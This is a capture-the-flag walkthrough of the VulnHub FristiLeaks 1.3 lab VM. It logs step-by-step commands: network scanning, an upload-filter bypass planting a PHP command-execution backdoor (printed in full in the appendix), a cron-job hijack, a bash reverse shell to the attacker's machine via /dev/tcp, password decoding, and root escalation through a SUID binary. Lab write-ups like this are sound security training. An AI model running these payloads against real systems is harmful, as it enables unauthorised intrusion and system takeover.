vulnhub.com fristileaks1.3


host: 192.168.56.1 dhcp-server: 192.168.56.100 kali: 192.168.56.101

* log
  # 2015/12/24 14:45 -> 16:30 (1hr 45min)
  # 2015/12/25 15:00 -> 17:45 (2hr 45min)
  # total time = 4hrs 30min

* discovery - target
  * nmap --min-parallelism=100 -sP -T5 192.168.56.0/24
  * found target: 192.168.56.102
  
* discovery - services
  * nmap --min-parallelism=100 -A -T5 -p1-65535 192.168.56.102
  * found ports: 80

* enumerate port 80
  * wget http://192.168.56.102
  * cat index.html
  * wget http://192.168.56.102/images/keep-calm.png
  * wget http://192.168.56.102/robots.txt
    * robots.txt: disallow /cola /sisi /beer
  * wget http://192.168.56.102/cola/
    * since its not the URL, and we should drink fristi
  * wget http://192.168.56.102/fristi/
    * cat index.html
      * read description meta tag reg comment about base64
      * noticed second commented out base64
      * suspect username: eezeepz
    * extracted commented out line using vi
      * deleted other lines
      * joined all lines (:%j)
      * removed spaces (:%s/\ //g)
      * saved into fristi_img2.txt
  * base64 -d fristi_img2.txt > img2
  * file img2
  * mv img2 img2.png
  * suspect password: keKkeKKeKKeKkEkkEk

* access
  * http://192.168.56.102/fristi/
  * myusername: eezeepz, mypassword: keKkeKKeKKeKkEkkEk
  * logged into http://192.168.56.102/fristi/login_success.php
  * clicked upload file link to http://192.168.56.102/fristi/upload.php
  * uploaded img2.png and got message regarding /uploads
  * verified upload location http://192.168.56.102/fristi/uploads/img2.png

* attempted shell access using weevely (failed)
  * generated weevely shell: weevely generate password shell.php
  * cp /usr/share/weevely/shell.php .
  * attempted upload: only allowed png,jpg,gif
  * mv shell.php shell.gif
  * uploaded and connected
  * weevely http://192.168.56.102/fristi/uploads/shell.gif password
  * fixed pythong issues
    * tar zxvf PySocks-1.5.6.tar.gz
    * cd PySocks-1.5.6/
    * ./setup.py build
    * ./setup.py install
  * weevely http://192.168.56.102/fristi/uploads/shell.gif password
  * unable to connect

* used old script to execute commands
  * renamed to shell.php.jpg
  * uploaded file
  * curl http://192.168.56.102/fristi/uploads/shell.php.jpg?cmd=id
  * uid=48(apache) gid=48(apache) groups=48(apache)
  * curl http://192.168.56.102/fristi/uploads/shell.php.jpg -d cmd="cat /etc/passwd"
  * found: eezeepz, admin, fristigod, fristi
  * ls -l /home/
  * found: drwx---r-x. on eezeepz
  * ls -l /home/eezeepz
  * found: 
    * notes.txt
    * commands (various)
  * cat /home/eezeepz/notes.txt
  * found: 
    * cron runs /tmp/runthis with admin privileges every minute
    * commands chmod, df, cat, echo, ps, grep, egrep in /home/admin
    * access to /usr/bin/*
  * changed access to /home/admin
    * curl http://192s/shell.php.jpg -d cmd="echo '/home/admin/chmod 755 /home/admin/' > /tmp/runthis"
  * ls -las /home/admin/
  * found: cryptedpass.txt, cryptpass.py, and whoisyourgodnow.txt (owner by fristigod)
  * cat /home/admin/whoisyourgodnow.txt
  * found: =RFn0AKnlMHMPIzpyuTI0ITG
  * cat /home/admin/cryptedpass.txt
  * found: mVGZ3O3omkJLmy2pcuTq
  * cat /home/admin/cryptpass.py
  * found:
    * function does base64 then rot13
  * created own script to decrypt password
  * python ./decryptpass.py mVGZ3O3omkJLmy2pcuTq
  * found: thisisalsopw123
  * python ./decryptpass.py =RFn0AKnlMHMPIzpyuTI0ITG
  * found: LetThereBeFristi!
 
* interactive shell
  * got tired of using the php script and decided to get interactive shell
  * on kali: nc -n -vvv -l -p 80
  * ran via php: /bin/bash -i > /dev/tcp/192.168.56.101/80 0<&1 2>&1, but encoded for url as %2Fbin%2Fbash%20-i%20%3E%20%2Fdev%2Ftcp%2F192.168.56.101%2F80%200%3C%261%202%3E%261
  * now have shell (without TTY, so cannot use su yet)
  * find files owned by users
    * find / -user eezeepz 2>&1 | grep -v "Permission denied"
    * find / -user admin 2>&1 | grep -v "Permission denied"
    * find / -user fristi 2>&1 | grep -v "Permission denied"
    * find / -user fristigod 2>&1 | grep -v "Permission denied"
      * found: /var/fristigod
    * found: empty mailboxes
    * found: /var/www/notes.txt 
      * not very useful since we already figured this out
  * tried to get tty shell 
    // https://pen-testing.sans.org/blog/2014/07/08/sneaky-stealthy-su-in-web-shells
    // http://netsec.ws/?p=337
  * /usr/bin/python -c 'import pty; pty.spawn("/bin/sh")'
  * used: su fristigod and password: LetThereBeFristi!
  * cd /var/fristigod
  * ls -las 
  * found: .bash_history and .secret_admin_stuff
  * cat .bash_history
  * found: sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
  * ls -las /var/fristigod/.secret_admin_stuff/
  * found: suid/guid set on doCom file and owned by root:root
  * file /var/fristigod/.secret_admin_stuff/doCom
  * strings /var/fristigod/.secret_admin_stuff/doCom
  * sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
  * found: Usage: ./program_name terminal_command ...
  * sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom id
  * found: uid=0(root) gid=100(users) groups=100(users),502(fristigod)
  * sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom bash
  !! got root !!
  * found: cat /root/fristileaks_secrets.txt
  * cat /root/fristileaks_secrets.txt
  * found: Flag: Y0u_kn0w_y0u_l0ve_fr1st1

# Other
* /root/.c has source for doCom
* cat /root/.mysql_history
  

* appendix
// http://snipplr.com/view/72936/simple-php-backdoor-shell/
-- start of old script -- 
<?php
if(isset($_REQUEST['cmd']))
{
  $cmd = $_REQUEST['cmd'];
  system($cmd);
  echo "<pre>$cmd</pre>";
}
else
{
  echo "<pre>usage: ?cmd=</pre>";
}
?>

-- end of old script


// modified cryptpass.py script
-- start of decryptpass.py script --
import base64,codecs,sys

#def encodeString(str):
#    base64string= base64.b64encode(str)
#    return codecs.encode(base64string[::-1], 'rot13')

def decodeString(str):
    rottedString= codecs.encode(str[::-1], 'rot13')
    return base64.b64decode(rottedString)

#cryptoResult=encodeString(sys.argv[1])
#print cryptoResult

#decryptedResult=decodeString(cryptoResult)
#print decryptedResult

decryptedResult=decodeString(sys.argv[1])
print decryptedResult
-- end of decryptpass.py script --

See also